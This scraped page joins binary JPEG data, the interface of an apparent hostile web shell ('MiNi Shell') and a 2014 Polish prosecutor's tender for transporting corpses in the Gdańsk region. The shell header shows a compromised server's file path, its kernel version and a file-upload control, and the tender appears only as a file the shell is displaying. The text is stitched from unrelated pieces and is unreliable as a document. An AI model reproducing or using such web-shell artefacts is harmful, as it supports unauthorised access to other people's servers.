JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141119/379404-N-2014.html

<p class="kh_header"><b>Gdańsk: Przewóz zwłok na wniosek Prokuratur Rejonowych w : Gdańsku, Sopocie, Pruszczu Gdańskim, Gdyni, Wejherowie, Pucku, Kartuzach, Kościerzynie, Kwidzynie, Malborku, Starogardzie Gdańskim, Tczewie</b><br>
<b>Numer ogłoszenia: 379404 - 2014; data zamieszczenia: 19.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa , ul. Wały Jagiellońskie 36, 80-853 Gdańsk, woj. pomorskie, tel. 058 30 40 108, 30 40 110, faks 058 30 40 108.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przewóz zwłok na wniosek Prokuratur Rejonowych w : Gdańsku, Sopocie, Pruszczu Gdańskim, Gdyni, Wejherowie, Pucku, Kartuzach, Kościerzynie, Kwidzynie, Malborku, Starogardzie Gdańskim, Tczewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi w zakresie przewozu zwłok ludzkich z miejsc zdarzeń na wniosek Prokuratur Rejonowych w: Gdańsk Śródmieście, Gdańsk Wrzeszcz, Gdańsk Oliwa, Sopot z siedzibą w Gdańsku ul. Kołobrzeska 41, Pruszcz Gdański, Gdyni, Wejherowo, Puck, Kartuzy, Kościerzyna, Kwidzyn, Malbork, Starogard Gdański, Tczew do wskazanego przez prokuraturę prosektorium lub do Zakładu Medycyny Sądowej w celu ustalenia przyczyn zgonu.
Wykonawca zobowiązany będzie do:
1.zapewnienia całodobowego stanowiska logistycznego 
2.odbioru w swojej siedzibie całodobowo, również w dni wolne od pracy i dni świąteczne, zgłoszeń przewozów zwłok,
3.przewozu zwłok w jak najkrótszym czasie od zgłoszenia i do miejsca zgodnie z wnioskiem prokuratury,
4.realizacji usługi przewozu zwłok bez względu na stopień ich uszkodzenia lub stanu ich rozkładu oraz miejsce znalezienia,
5.zapewnienia przewóz zwłok zgodnie z obowiązującymi przepisami sanitarnymi,
6.zapewnienia przewozu zwłok transportem drogowym, do którego mogą być wykorzystywane pojazdy samochodowe zarejestrowane jako karawan, który powinien być oznakowany na zewnątrz w sposób widoczny i trwały,
7.należytego zabezpieczenia w worki na zwłoki, rękawiczki i inne niezbędne materiały potrzebne do prawidłowego wykonania zamówienia, 
8.wystawienia faktury na podstawie dołączonego pisemne zlecenia wystawionego przez prokuratora z dokładnym określeniem daty i miejsca wykonania usługi, 
9.zachowania tajemnicy służbowej w zakresie danych dotyczących przewożonych zwłok i okoliczności ich znalezienia,
10.prowadzenia rejestru dyżurów pełnionych przez jego pracowników, w których należy uwzględnić : imię i nazwisko pracownika pełniącego dyżur, datę i godziny pełnienia dyżuru, dane dotyczące zgłoszenia, instytucja zgłaszająca, miejsce zdarzenia, czas zgłoszenia, formularz rejestru wg załącznik nr 7.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny spełnienia warunku wg formuły spełnia - nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny spełnienia warunku wg formuły spełnia - nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że dysponuj odpowiednim potencjałem technicznym do wykonania zamówienia to jest posiada, co najmniej cztery samochody służące do przewozu zwłok ludzkich, którymi dysponuje lub będzie dysponował, własnymi, najętymi, tytułem użyczenia, dzierżawy, leasingu, które spełniają wymagania sanitarne określone dla zwłok Rozp. Min. Zdrowia z dnia 27 grudnia 2007r w sprawie wydania pozwoleń i zaświadczeń na przewóz zwłok i szczątków ludzkich Dz. U. Nr 249 poz.1866, wraz z aktualnymi zezwoleniami inspektora sanitarnego dotyczącymi spełnienia wymogów sanitarnych, wystawionymi nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny spełnienia warunku wg formuły spełnia - nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny spełnienia warunku wg formuły spełnia - nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania o ile dotyczy, Zobowiązanie do udostępnienia zasobów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Parametry techniczne - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy zgodnie z zapisami rozdziału XVI SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.prokuratura.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Gdańsku ul. Okopowa 7 piętro IV pok.405.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2014 godzina 09:00, miejsce: Prokuratura Okręgowa w Gdańsku ul. Wały Jagiellońskie 36, 80-853 Gdańsk, parter biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przewóz zwłok na wniosek Prokuratur Rejonowych w: Gdańsk Śródmieście, Gdańsk Wrzeszcz, Gdańsk Oliwa, Pruszczu Gdańskim oraz Sopocie z siedzibą w Gdańsku ul. Kołobrzeska 41.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązany będzie do:
1.zapewnienia całodobowego stanowiska logistycznego 
2.odbioru w swojej siedzibie całodobowo, również w dni wolne od pracy i dni świąteczne, zgłoszeń przewozów zwłok,
3.przewozu zwłok w jak najkrótszym czasie od zgłoszenia i do miejsca zgodnie z wnioskiem prokuratury,
4.realizacji usługi przewozu zwłok bez względu na stopień ich uszkodzenia lub stanu ich rozkładu oraz miejsce znalezienia,
5.zapewnienia przewóz zwłok zgodnie z obowiązującymi przepisami sanitarnymi,
6.zapewnienia przewozu zwłok transportem drogowym, do którego mogą być wykorzystywane pojazdy samochodowe zarejestrowane jako karawan, który powinien być oznakowany na zewnątrz w sposób widoczny i trwały,
7.należytego zabezpieczenia w worki na zwłoki, rękawiczki i inne niezbędne materiały potrzebne do prawidłowego wykonania zamówienia, 
8.wystawienia faktury na podstawie dołączonego pisemne zlecenia wystawionego przez prokuratora z dokładnym określeniem daty i miejsca wykonania usługi, 
9.zachowania tajemnicy służbowej w zakresie danych dotyczących przewożonych zwłok i okoliczności ich znalezienia,
10.prowadzenia rejestru dyżurów pełnionych przez jego pracowników, w których należy uwzględnić : imię i nazwisko pracownika pełniącego dyżur, datę i godziny pełnienia dyżuru, dane dotyczące zgłoszenia, instytucja zgłaszająca, miejsce zdarzenia, czas zgłoszenia, formularz rejestru wg załącznik nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Parametry techniczne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przewóz zwłok na wniosek Prokuratura Rejonowej w Gdyni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązany będzie do:
1.zapewnienia całodobowego stanowiska logistycznego 
2.odbioru w swojej siedzibie całodobowo, również w dni wolne od pracy i dni świąteczne, zgłoszeń przewozów zwłok,
3.przewozu zwłok w jak najkrótszym czasie od zgłoszenia i do miejsca zgodnie z wnioskiem prokuratury,
4.realizacji usługi przewozu zwłok bez względu na stopień ich uszkodzenia lub stanu ich rozkładu oraz miejsce znalezienia,
5.zapewnienia przewóz zwłok zgodnie z obowiązującymi przepisami sanitarnymi,
6.zapewnienia przewozu zwłok transportem drogowym, do którego mogą być wykorzystywane pojazdy samochodowe zarejestrowane jako karawan, który powinien być oznakowany na zewnątrz w sposób widoczny i trwały,
7.należytego zabezpieczenia w worki na zwłoki, rękawiczki i inne niezbędne materiały potrzebne do prawidłowego wykonania zamówienia, 
8.wystawienia faktury na podstawie dołączonego pisemne zlecenia wystawionego przez prokuratora z dokładnym określeniem daty i miejsca wykonania usługi, 
9.zachowania tajemnicy służbowej w zakresie danych dotyczących przewożonych zwłok i okoliczności ich znalezienia,
10.prowadzenia rejestru dyżurów pełnionych przez jego pracowników, w których należy uwzględnić : imię i nazwisko pracownika pełniącego dyżur, datę i godziny pełnienia dyżuru, dane dotyczące zgłoszenia, instytucja zgłaszająca, miejsce zdarzenia, czas zgłoszenia, formularz rejestru wg załącznik nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Parametry techniczne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przewóz zwłok na wniosek Prokuratury Rejonowej w Wejherowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązany będzie do:
1.zapewnienia całodobowego stanowiska logistycznego 
2.odbioru w swojej siedzibie całodobowo, również w dni wolne od pracy i dni świąteczne, zgłoszeń przewozów zwłok,
3.przewozu zwłok w jak najkrótszym czasie od zgłoszenia i do miejsca zgodnie z wnioskiem prokuratury,
4.realizacji usługi przewozu zwłok bez względu na stopień ich uszkodzenia lub stanu ich rozkładu oraz miejsce znalezienia,
5.zapewnienia przewóz zwłok zgodnie z obowiązującymi przepisami sanitarnymi,
6.zapewnienia przewozu zwłok transportem drogowym, do którego mogą być wykorzystywane pojazdy samochodowe zarejestrowane jako karawan, który powinien być oznakowany na zewnątrz w sposób widoczny i trwały,
7.należytego zabezpieczenia w worki na zwłoki, rękawiczki i inne niezbędne materiały potrzebne do prawidłowego wykonania zamówienia, 
8.wystawienia faktury na podstawie dołączonego pisemne zlecenia wystawionego przez prokuratora z dokładnym określeniem daty i miejsca wykonania usługi, 
9.zachowania tajemnicy służbowej w zakresie danych dotyczących przewożonych zwłok i okoliczności ich znalezienia,
10.prowadzenia rejestru dyżurów pełnionych przez jego pracowników, w których należy uwzględnić : imię i nazwisko pracownika pełniącego dyżur, datę i godziny pełnienia dyżuru, dane dotyczące zgłoszenia, instytucja zgłaszająca, miejsce zdarzenia, czas zgłoszenia, formularz rejestru wg załącznik nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Parametry techniczne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przewóz zwłok na wniosek Prokuratury Rejonowej w Pucku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązany będzie do:
1.zapewnienia całodobowego stanowiska logistycznego 
2.odbioru w swojej siedzibie całodobowo, również w dni wolne od pracy i dni świąteczne, zgłoszeń przewozów zwłok,
3.przewozu zwłok w jak najkrótszym czasie od zgłoszenia i do miejsca zgodnie z wnioskiem prokuratury,
4.realizacji usługi przewozu zwłok bez względu na stopień ich uszkodzenia lub stanu ich rozkładu oraz miejsce znalezienia,
5.zapewnienia przewóz zwłok zgodnie z obowiązującymi przepisami sanitarnymi,
6.zapewnienia przewozu zwłok transportem drogowym, do którego mogą być wykorzystywane pojazdy samochodowe zarejestrowane jako karawan, który powinien być oznakowany na zewnątrz w sposób widoczny i trwały,
7.należytego zabezpieczenia w worki na zwłoki, rękawiczki i inne niezbędne materiały potrzebne do prawidłowego wykonania zamówienia, 
8.wystawienia faktury na podstawie dołączonego pisemne zlecenia wystawionego przez prokuratora z dokładnym określeniem daty i miejsca wykonania usługi, 
9.zachowania tajemnicy służbowej w zakresie danych dotyczących przewożonych zwłok i okoliczności ich znalezienia,
10.prowadzenia rejestru dyżurów pełnionych przez jego pracowników, w których należy uwzględnić : imię i nazwisko pracownika pełniącego dyżur, datę i godziny pełnienia dyżuru, dane dotyczące zgłoszenia, instytucja zgłaszająca, miejsce zdarzenia, czas zgłoszenia, formularz rejestru wg załącznik nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Parametry Techniczne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przewóz zwłok na wniosek Prokuratury rejonowej w Kartuzach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązany będzie do:
1.zapewnienia całodobowego stanowiska logistycznego 
2.odbioru w swojej siedzibie całodobowo, również w dni wolne od pracy i dni świąteczne, zgłoszeń przewozów zwłok,
3.przewozu zwłok w jak najkrótszym czasie od zgłoszenia i do miejsca zgodnie z wnioskiem prokuratury,
4.realizacji usługi przewozu zwłok bez względu na stopień ich uszkodzenia lub stanu ich rozkładu oraz miejsce znalezienia,
5.zapewnienia przewóz zwłok zgodnie z obowiązującymi przepisami sanitarnymi,
6.zapewnienia przewozu zwłok transportem drogowym, do którego mogą być wykorzystywane pojazdy samochodowe zarejestrowane jako karawan, który powinien być oznakowany na zewnątrz w sposób widoczny i trwały,
7.należytego zabezpieczenia w worki na zwłoki, rękawiczki i inne niezbędne materiały potrzebne do prawidłowego wykonania zamówienia, 
8.wystawienia faktury na podstawie dołączonego pisemne zlecenia wystawionego przez prokuratora z dokładnym określeniem daty i miejsca wykonania usługi, 
9.zachowania tajemnicy służbowej w zakresie danych dotyczących przewożonych zwłok i okoliczności ich znalezienia,
10.prowadzenia rejestru dyżurów pełnionych przez jego pracowników, w których należy uwzględnić : imię i nazwisko pracownika pełniącego dyżur, datę i godziny pełnienia dyżuru, dane dotyczące zgłoszenia, instytucja zgłaszająca, miejsce zdarzenia, czas zgłoszenia, formularz rejestru wg załącznik nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Parametry techniczne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przewóz zwłok na wniosek Prokuratury Rejonowej w Kościerzynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązany będzie do:
1.zapewnienia całodobowego stanowiska logistycznego 
2.odbioru w swojej siedzibie całodobowo, również w dni wolne od pracy i dni świąteczne, zgłoszeń przewozów zwłok,
3.przewozu zwłok w jak najkrótszym czasie od zgłoszenia i do miejsca zgodnie z wnioskiem prokuratury,
4.realizacji usługi przewozu zwłok bez względu na stopień ich uszkodzenia lub stanu ich rozkładu oraz miejsce znalezienia,
5.zapewnienia przewóz zwłok zgodnie z obowiązującymi przepisami sanitarnymi,
6.zapewnienia przewozu zwłok transportem drogowym, do którego mogą być wykorzystywane pojazdy samochodowe zarejestrowane jako karawan, który powinien być oznakowany na zewnątrz w sposób widoczny i trwały,
7.należytego zabezpieczenia w worki na zwłoki, rękawiczki i inne niezbędne materiały potrzebne do prawidłowego wykonania zamówienia, 
8.wystawienia faktury na podstawie dołączonego pisemne zlecenia wystawionego przez prokuratora z dokładnym określeniem daty i miejsca wykonania usługi, 
9.zachowania tajemnicy służbowej w zakresie danych dotyczących przewożonych zwłok i okoliczności ich znalezienia,
10.prowadzenia rejestru dyżurów pełnionych przez jego pracowników, w których należy uwzględnić : imię i nazwisko pracownika pełniącego dyżur, datę i godziny pełnienia dyżuru, dane dotyczące zgłoszenia, instytucja zgłaszająca, miejsce zdarzenia, czas zgłoszenia, formularz rejestru wg załącznik nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
